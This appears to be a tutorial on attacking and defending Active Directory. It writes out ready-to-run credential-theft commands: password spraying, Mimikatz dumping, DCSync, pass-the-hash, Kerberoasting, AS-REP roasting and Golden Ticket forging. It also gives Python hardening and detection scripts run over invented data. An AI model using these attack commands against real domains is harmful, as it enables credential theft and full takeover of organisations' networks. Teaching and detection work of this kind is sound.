Key Takeaways
- Active Directory is the identity backbone of 95%+ of enterprises
- Kerberos attacks bypass password authentication entirely
- BloodHound reveals attack paths humans can't find manually
- Domain Admin compromise means total organizational compromise
1. Understanding Active Directory
Active Directory (AD) is Microsoft's directory service used by 95%+ of Fortune 500 companies for centralized identity management. Compromising Domain Admin means complete control over every user, computer, and file in the organization.
Core Components
- Domain Controller (DC): Server running AD DS that authenticates users and answers directory queries
- Domain: Administrative and security boundary for objects
- Forest: Collection of domains joined by trust relationships
- Kerberos: Primary authentication protocol (ticket-based)
- NTLM: Legacy authentication (hash-based challenge/response)
- LDAP: Protocol for directory queries (port 389/636)
2. AD Enumeration
```powershell
# PowerShell enumeration (ActiveDirectory module)
Get-ADDomain
Get-ADUser -Filter * -Properties *
Get-ADGroup -Filter * | Select Name
Get-ADGroupMember "Domain Admins"
Get-ADComputer -Filter *

# Net commands
net user /domain
net group "Domain Admins" /domain

# BloodHound collection
.\SharpHound.exe -c All
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
```
BloodHound Queries
- Shortest Paths to Domain Admins
- Kerberoastable Accounts
- Users with DCSync Rights
- Computers where Domain Users are Local Admin
3. Credential-Based Attacks
Password Spraying
```shell
crackmapexec smb dc.domain.local -u users.txt -p 'Summer2024!'
kerbrute passwordspray -d domain.local users.txt 'Password123'
```
NTLM Hash Extraction (Mimikatz)
```
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::dcsync /user:Administrator
```
Pass-the-Hash
```shell
# Use the NTLM hash directly, without cracking it
psexec.py -hashes :NTLM_HASH USER@TARGET_HOST
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH
```
4. Kerberos Attacks
Kerberoasting
Any authenticated domain user can request service tickets for accounts with SPNs and crack them offline - no special privileges needed!
```shell
Rubeus.exe kerberoast /outfile:hashes.txt
GetUserSPNs.py domain/user:pass -request -outputfile hashes.txt
hashcat -m 13100 hashes.txt rockyou.txt
```
Golden Ticket
Forge a TGT with the krbtgt hash - a forged ticket gives complete domain persistence for 10 years!
```
mimikatz # lsadump::dcsync /user:krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /ptt
```
AS-REP Roasting
```shell
GetNPUsers.py domain/ -usersfile users.txt -format hashcat
hashcat -m 18200 asrep.txt rockyou.txt
```
5. Persistence Techniques
- DCSync: Replicate credentials from DC (lsadump::dcsync)
- Skeleton Key: Inject master password into LSASS
- AdminSDHolder: Persistent ACL on privileged groups
- Golden Ticket: Valid until krbtgt reset twice
6. Defense & Hardening
Critical Hardening Steps
- Tiered Admin Model: DA only on Tier 0 systems
- Reset krbtgt twice yearly (minimum)
- Protected Users Group for sensitive accounts
- LAPS for local admin passwords
- Credential Guard on all systems
- Disable LLMNR/NBT-NS to prevent relay
- gMSA for service accounts
- Fewer than 5 Domain Admins recommended
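Several items in the list above can be turned into a repeatable posture check. The script below is an added example, not from the original page or any of the tools it names: it evaluates a constructed snapshot of directory attributes (the accounts, SPNs and dates are invented) against the thresholds the list gives, namely krbtgt older than 180 days (twice-yearly reset), 5 or more Domain Admins, privileged accounts outside Protected Users, accounts with the `DONT_REQ_PREAUTH` userAccountControl bit (0x400000), and SPN-bearing accounts that are not gMSAs. In a real run the snapshot would be filled from `Get-ADUser`/`Get-ADGroupMember` output.

```python
"""Posture check for the hardening list above, evaluated against a constructed
snapshot of directory attributes rather than a live domain. Added example; the
sample objects are invented, the attribute semantics follow the AD schema."""
from datetime import datetime, timedelta, timezone

UAC_DONT_REQ_PREAUTH = 0x400000          # userAccountControl: no Kerberos pre-auth (AS-REP roastable)
KRBTGT_MAX_AGE = timedelta(days=180)     # "reset krbtgt twice yearly" => never older than ~180 days
MAX_DOMAIN_ADMINS = 5                    # "fewer than 5 Domain Admins"
NOW = datetime(2024, 9, 1, tzinfo=timezone.utc)   # fixed clock so the sample is reproducible

# Constructed snapshot of the attributes the checks need (pwdLastSet, group
# membership, userAccountControl, servicePrincipalName, objectClass).
SNAPSHOT = {
    "krbtgt_pwd_last_set": NOW - timedelta(days=400),
    "domain_admins": ["da.alice", "da.bob", "da.carol", "da.dave", "svc.backup"],
    "protected_users": ["da.alice", "da.bob"],
    "users": [
        {"sam": "svc.sql",    "uac": 0x10200,  "spns": ["MSSQLSvc/sql01.corp.local:1433"], "gmsa": False},
        {"sam": "svc.backup", "uac": 0x10200,  "spns": ["backup/bkp01.corp.local"],        "gmsa": False},
        {"sam": "svc.web$",   "uac": 0x1000,   "spns": ["HTTP/web01.corp.local"],          "gmsa": True},
        {"sam": "legacy.app", "uac": 0x400200, "spns": [],                                  "gmsa": False},
        {"sam": "da.alice",   "uac": 0x200,    "spns": [],                                  "gmsa": False},
    ],
}


def audit(snapshot, now=NOW):
    """Return one finding string per deviation from the hardening list."""
    findings = []

    age = now - snapshot["krbtgt_pwd_last_set"]
    if age > KRBTGT_MAX_AGE:
        findings.append(f"krbtgt password is {age.days} days old; a forged Golden Ticket "
                        f"stays valid until it is reset twice")

    das = snapshot["domain_admins"]
    if len(das) >= MAX_DOMAIN_ADMINS:
        findings.append(f"{len(das)} Domain Admins (recommended: fewer than {MAX_DOMAIN_ADMINS})")

    protected = set(snapshot["protected_users"])
    for da in das:
        if da not in protected:
            findings.append(f"Domain Admin {da} is not in Protected Users")

    for u in snapshot["users"]:
        if u["uac"] & UAC_DONT_REQ_PREAUTH:
            findings.append(f"{u['sam']} does not require Kerberos pre-authentication (AS-REP roastable)")
        if u["spns"] and not u["gmsa"]:
            findings.append(f"{u['sam']} has an SPN but is not a gMSA (Kerberoastable; unlike a gMSA "
                            f"its password is not rotated automatically)")
    return findings


if __name__ == "__main__":
    for f in audit(SNAPSHOT):
        print("-", f)
```

On the constructed snapshot the check reports eight findings; note how `svc.backup` appears twice (Kerberoastable and a Domain Admin outside Protected Users), which is exactly the kind of short path to DA the BloodHound queries in section 2 surface.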
7. Detection & Monitoring
| Event ID | Attack Indicator |
|---|---|
| 4768 | TGT requested (Golden ticket) |
| 4769 | TGS requested (Kerberoasting) |
| 4771 | Pre-auth failed (AS-REP roast) |
| 4625 | Failed logon (Password spray) |
| 4662 | AD operation (DCSync) |
| 4776 | NTLM auth (Pass-the-Hash) |
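The event IDs alone are noisy; the value is in which fields to filter on. The following is an added example (not from the page or any listed tool) that implements three rows of the table over constructed Security events: 4769 with `TicketEncryptionType` 0x17 (RC4) for a non-computer, non-krbtgt service (Kerberoasting), 4625 from one source against many distinct accounts in a short window (password spraying), and 4662 whose `Properties` carry the DS-Replication-Get-Changes / -All control access right GUIDs from an account that is not a domain controller (DCSync). The field names follow the Security log's EventData; the DC account list, thresholds and sample events are constructed.

```python
"""Detection logic for the Kerberoasting, password-spray and DCSync rows of the
table above, run over constructed Windows Security events. Added example: the
field names follow the Security log's EventData, the events are invented."""
from collections import defaultdict
from datetime import datetime, timedelta

# Control access rights that appear in the Properties field of 4662 when
# an account pulls password data through directory replication (DCSync).
REPL_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")   # DS-Replication-Get-Changes-All
RC4_HMAC = "0x17"                     # TicketEncryptionType a Kerberoaster asks for; AES is 0x12
DC_ACCOUNTS = {"DC01$", "DC02$"}      # constructed: accounts expected to replicate
SPRAY_THRESHOLD = 5                   # distinct accounts failing from one source...
SPRAY_WINDOW = timedelta(minutes=10)  # ...inside this window


def _t(s):
    return datetime.fromisoformat(s)


def _ev(eid, time, **fields):
    return {"EventID": eid, "Time": _t(time), **fields}


# Constructed sample: one host (10.0.5.23) roasts two SPNs and sprays six
# accounts; a plain user requests replication; the rest is normal traffic.
EVENTS = [
    _ev(4769, "2024-09-01T09:00:01", TargetUserName="jsmith@CORP.LOCAL", ServiceName="svc.sql",
        TicketEncryptionType="0x17", IpAddress="10.0.5.23"),
    _ev(4769, "2024-09-01T09:00:02", TargetUserName="jsmith@CORP.LOCAL", ServiceName="svc.backup",
        TicketEncryptionType="0x17", IpAddress="10.0.5.23"),
    _ev(4769, "2024-09-01T09:00:05", TargetUserName="aturner@CORP.LOCAL", ServiceName="FS01$",
        TicketEncryptionType="0x12", IpAddress="10.0.7.8"),         # AES ticket for a file server: normal
    _ev(4662, "2024-09-01T09:05:00", SubjectUserName="DC02$",
        Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),        # DC-to-DC replication: normal
    _ev(4662, "2024-09-01T09:06:00", SubjectUserName="jsmith",
        Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
] + [
    _ev(4625, f"2024-09-01T09:10:{i:02d}", TargetUserName=f"user{i}", IpAddress="10.0.5.23",
        SubStatus="0xC000006A")                                      # bad password, six accounts in a minute
    for i in range(6)
] + [
    _ev(4625, "2024-09-01T09:12:00", TargetUserName="aturner", IpAddress="10.0.7.8", SubStatus="0xC000006A"),
]


def detect_kerberoast(events):
    """4769 with RC4 for a non-computer, non-krbtgt service, grouped by requester and source."""
    by_user = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_user[(e["TargetUserName"], e["IpAddress"])].add(svc)
    return {k: sorted(v) for k, v in by_user.items()}


def detect_spray(events, threshold=SPRAY_THRESHOLD, window=SPRAY_WINDOW):
    """One source IP failing against >= threshold distinct accounts inside the window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            by_ip[e["IpAddress"]].append((e["Time"], e["TargetUserName"]))
    hits = {}
    for ip, fails in by_ip.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            users = {u for ts, u in fails[i:] if ts - start <= window}
            if len(users) >= threshold:
                hits[ip] = len(users)
                break
    return hits


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS):
    """4662 carrying a replication GUID from anything that is not a domain controller."""
    return sorted({e["SubjectUserName"] for e in events
                   if e["EventID"] == 4662
                   and e["SubjectUserName"] not in dc_accounts
                   and any(g in e["Properties"].lower() for g in REPL_GUIDS)})


if __name__ == "__main__":
    print("kerberoast:", detect_kerberoast(EVENTS))
    print("spray:", detect_spray(EVENTS))
    print("dcsync:", detect_dcsync(EVENTS))
```

The allow-list of DC accounts matters more than the GUID match: legitimate replication between domain controllers produces the same 4662, so the signal is the identity doing the replicating, not the operation itself. Likewise the RC4 filter is what separates Kerberoasting from ordinary service ticket traffic, which on a current domain is AES.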
8. Essential Tools
Offensive: Mimikatz, BloodHound, Rubeus, Impacket, CrackMapExec, PowerView
Defensive: PingCastle, Purple Knight, Defender for Identity
FAQ
How fast can AD be compromised?
Average time to DA in pentests: 48-72 hours. Many environments fall within hours due to misconfigurations.
What's the first check in an AD assessment?
Run BloodHound for attack paths + PingCastle for security scoring. Look for Kerberoastable accounts and paths to DA.